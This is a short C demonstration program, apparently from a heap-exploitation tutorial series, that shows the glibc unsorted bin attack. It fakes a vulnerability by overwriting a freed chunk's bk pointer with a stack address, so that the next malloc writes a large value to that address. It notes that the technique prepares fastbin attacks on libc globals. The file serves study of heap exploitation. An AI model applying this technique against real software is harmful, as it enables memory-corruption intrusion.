13.unsorted_bin_attack

 1 #include <stdio.h>
 2 #include <stdlib.h>
 3 
 4 int main(){
 5     fprintf(stderr, "This file demonstrates unsorted bin attack by write a large unsigned long value into stack\n");
 6     fprintf(stderr, "In practice, unsorted bin attack is generally prepared for further attacks, such as rewriting the "
 7            "global variable global_max_fast in libc for further fastbin attack\n\n");
 8 
 9     unsigned long stack_var=0;
10     fprintf(stderr, "Let's first look at the target we want to rewrite on stack:\n");
11     fprintf(stderr, "%p: %ld\n\n", &stack_var, stack_var);
12 
13     unsigned long *p=malloc(400);
14     fprintf(stderr, "Now, we allocate first normal chunk on the heap at: %p\n",p);
15     fprintf(stderr, "And allocate another normal chunk in order to avoid consolidating the top chunk with"
16            "the first one during the free()\n\n");
17     malloc(500);
18 
19     free(p);
20     fprintf(stderr, "We free the first chunk now and it will be inserted in the unsorted bin with its bk pointer "
21            "point to %p\n",(void*)p[1]);
22 
23     //------------VULNERABILITY-----------
24 
25     p[1]=(unsigned long)(&stack_var-2);
26     fprintf(stderr, "Now emulating a vulnerability that can overwrite the victim->bk pointer\n");
27     fprintf(stderr, "And we write it with the target address-16 (in 32-bits machine, it should be target address-8):%p\n\n",(void*)p[1]);
28 
29     //------------------------------------
30 
31     malloc(400);
32     fprintf(stderr, "Let's malloc again to get the chunk we just free. During this time, the target should have already been "
33            "rewritten:\n");
34     fprintf(stderr, "%p: %p\n", &stack_var, (void*)stack_var);
35 }